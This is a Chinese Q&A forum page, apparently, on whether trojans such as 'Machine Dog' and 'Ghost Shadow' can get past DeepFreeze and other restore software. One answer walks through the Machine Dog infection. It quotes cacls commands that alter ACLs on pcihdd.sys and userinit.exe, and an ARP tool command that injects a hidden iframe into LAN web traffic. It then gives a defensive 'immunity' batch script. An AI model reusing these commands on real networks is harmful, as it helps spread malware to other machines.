DeepFreeze Standard(冰点还原) V7.00.020.3172 中文版 这个版本的还原精灵有病毒能穿透吗
你设置的还原点如果已有病毒的话,就会再还原后还有病毒,冰点是不会被穿透的,冰点设置还原就是做一个镜像,一个受保护只读取方法的镜像。
关于木马穿透系统还原的详解
机器狗对用磁盘过滤驱动技术编写而成的系统还原保护程序进行穿透 第一步: 先下载ARP病毒(不是机器狗本体哦),病毒会在%Temp%释放随机命名的P处理。 父进程: 路径: C:\WINNT\system32\CMD.EXE PID值: 468 I信息: Windows NT Command Processor (Microsoft Corporation) 子进程: 进程: C:\WINNT\system32\cacls.exe 信息: Control ACLs Program (Microsoft Corporation) 命令行:cacls C:\winnt\system32\drivers\pcihdd.sys /e /p everyone:n 父进程: 路径: C:\WINNT\system32\CMD.EXE PID值: 468 信息: Windows NT Command Processor (Microsoft Corporation) 子进程: 路径: C:\WINNT\system32\cacls.exe 信息: Control ACLs Program (Microsoft Corporation) 命令行:cacls C:\winnt\system32\userinit.exe /e /p everyone:r (比较恶毒,就是替换everyone读取的权限) 目的: 建立pcihdd.sys文件夹,保证pcihdd.sys、userinit.exe不被NTFS文件系统的权限控制,目的是为了保证ARP嗅探器的文件权限不被控制。 第二步: 在保证ARP嗅探器的文件权限不被控制后,然后释放病毒文件pvc.exe,在192.168.0.1-192.168.0.254网段加入框架(病毒)数据包,参数为: -idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "iframe src='病毒执行网页地址' width=0 height=0/iframe" 然后这些网页利用系统漏洞,去除pcihdd.sys的文件属性,并删除原有的pcihdd.sys文件夹。到这时真正的机器狗本体才下载哦... 第三步: 机器狗开始检查PCIHDD.SYS,存在就替换,不存在就注册,释放底层驱动PCIHDD.SYS,通过名为PCIHDD.SYS驱动程序文件进行与DF的硬盘控制权的争夺,并修改userinit.exe文件,感染explorer,ctfmn等程序。中的时候也许会只有点点不正常的反应,重启之后嘛,你会知道什么叫狂风暴雨般的侵袭了! 中毒后机器的表现: 1.explorer进程相关类:IE老是报错,文件夹打开很慢,内存不能为READ.. 2.任务管理器打不开,底部工具栏变成很丑的灰白色。 3.各类杀毒软件打不开,启动程序改个名字就可以了4.输入法图标不见了,还看个啥子?被狗咬走了挖! 5.注册表,不要以为新狗不会动这个坑,它在这丢堆呢!最起码的反应就是注册表文件不能导入...占着WC不拉S...然后网吧很多用户会发现劲舞,DNF玩不了,为啥?这俩游戏都需要注册表滴挖! PS:严重点的,开机出现Unknown Hardware Erro,估计硬盘主引导区或分区信息出错了,重装系统重写记录吧!貌似我只见到一例。多的话那就太恐怖了。 机器免疫批处理! @echo ==============机器狗免疫=============== md C:\Windows\System32\explorer.exe cacls C:\Windows\System32\explorer.exe /e /d everyone:n md C:\Windows\System32\usrinit.exe cacls C:\Windows\System32\usrinit.exe /e /d everyone:n md C:\Windows\System32\PCIHDD.SYS cacls C:\Windows\System32\PCIHDD.SYS /e /d everyone:n
求采纳
电脑系统还原木马病毒也会清除掉吗?
不会,系统还原并不是系统格式化或者重装。只会恢复到之前计算机正常状态,并不会把病毒清除掉 要么重装系统(中间有格式化过程)
联想M10一键还原怎么使用?可以彻底清除木马或病毒么?
还原的是你的系统盘,但不保正你其他的盘文件不被感染,最还是还是装一个杀毒软件,AVAST!不错,家庭版是免费的,只需要注册就好了
哪些病毒和木马可以绕过冰点还原软件?
07年8月底出来的IGM和机器狗都能穿透的,不过现在变种好像不太有听到了,你这类情况的话建议用360把补丁打齐,再开冰点不会有事情的,关键我认为还是系统补丁。
能穿还原卡的病毒有哪些
“logo”蠕虫病毒,该病毒通过IPC共享进行传播,会感染系统中的可执行文件.病毒还会从网上下载木马,从而窃取感染机器上的敏感信息。
此木马可以在局域网中传播,能穿透冰点 还原精灵的等还原软件.自动在QQ上发传播.而且病毒针对全盘,用Ghost恢复C盘是没用的。主要是盗取密码,阻止以下杀毒软件的运行
还原软件被病毒穿透了,那些病毒会带来什么危害?
最著名的穿透型病毒要属机器狗了,对于大多数软件还原和硬件还原卡,机器狗利用了PCIHDD.sys驱动来争夺控制权,替换系统userinit.exe(windows登陆程序)和explorer.exe,重启后病毒依然还在。这样就实现了开机自启动,还能下载大量病毒木马运行。更恶性的穿透病毒是鬼影,据说它采用了Rootkit技术,能绕过windows的安全机制改写主引导记录,即使重装系统也无法清除,做到了无限复活,而且它在系统启动以前就已经加载,做到了“三无”特性——无文件、无系统启动项、无进程模块,还能攻击杀毒软件,下载大量病毒到系统中运行。对于远志还原精灵、雨过天晴、Comodo时光机这些修改MBR的引导型还原软件,鬼影会导致还原软件启动画面消失,还原功能损坏等结果;对于易游这种网吧还原,会导致在穿透的过程中,系统文件损坏崩溃,分区表损坏,或者无法进入桌面甚至无法引导系统,这是由于易游还原算法的特殊性决定的。其他的网吧还原大多都无明显现象,就是MBR被改写,重装、Ghost恢复系统无效。病毒的作者宣称能穿一切还原并非大话,经测试的确能穿透百分之九十以上的还原软件,大多数还原只能保护分区而不能保护主引导扇区,也不能抵御直接I/O,所以没有一款还原软件是真正安全的。每一个划时代的病毒都会令人头疼不已,不要以为有杀毒软件、防火墙、还原就高枕无忧了。